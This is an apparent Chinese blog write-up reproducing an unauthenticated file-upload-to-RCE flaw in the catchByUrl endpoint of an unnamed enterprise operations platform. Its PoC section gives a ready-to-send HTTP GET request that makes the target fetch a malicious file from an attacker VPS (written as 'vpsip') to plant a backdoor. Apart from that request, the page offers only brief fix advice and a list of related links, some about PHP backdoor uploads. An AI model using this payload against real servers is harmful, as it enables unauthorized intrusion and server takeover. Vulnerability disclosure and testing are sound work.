某科聚网一体化运营平台 catchByUrl 文件上传致RCE漏洞复现

0x01 产品简介

某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。

0x02 漏洞概述

某科聚网一体化运营平台 catchByUrl接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。

0x03 复现环境

0x04 漏洞复现

PoC

复制代码
GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1 
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close

验证

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
上海云盾第一敬业销售3 小时前
游戏盾在保障游戏安全方面的独特优势
网络·安全·游戏
Yff_world4 小时前
网络安全与 Web 基础笔记
前端·笔记·web安全
乾元4 小时前
暗网情报:自动化采集与情感分析在威胁狩猎中的应用
运维·网络·人工智能·深度学习·安全·架构·自动化
世界尽头与你4 小时前
(修复方案)CVE-2022-21587: Oracle E-Business Suite 访问控制错误漏洞
数据库·安全·oracle·渗透测试
千航@abc4 小时前
Win10/Win11 DCOM服务器进程启动器 CPU 占用过高解决方法
运维·安全·病毒·window10·window11·dcom进程·系统进程资源占用高
白帽子凯哥哥4 小时前
网络安全Web基础完全指南:从小白到入门安全测试
前端·sql·web安全·信息安全·渗透测试·漏洞
yuezhilangniao4 小时前
# 告别乱码:用FastAPI特性与Next.js打造类型安全的API通信
javascript·安全·fastapi
子木鑫5 小时前
[SUCTF 2019] CheckIn1 — 利用 .user.ini 与图片马构造 PHP 后门并绕过上传检测
android·开发语言·安全·php
h7ml5 小时前
企业微信 API 与内部系统集成时的 OAuth2.0 安全上下文传递机制
java·安全·企业微信
子木鑫5 小时前
[SUCTF2019 & GXYCTF2019] 文件上传绕过实战:图片马 + .user.ini / .htaccess 构造 PHP 后门
android·开发语言·安全·php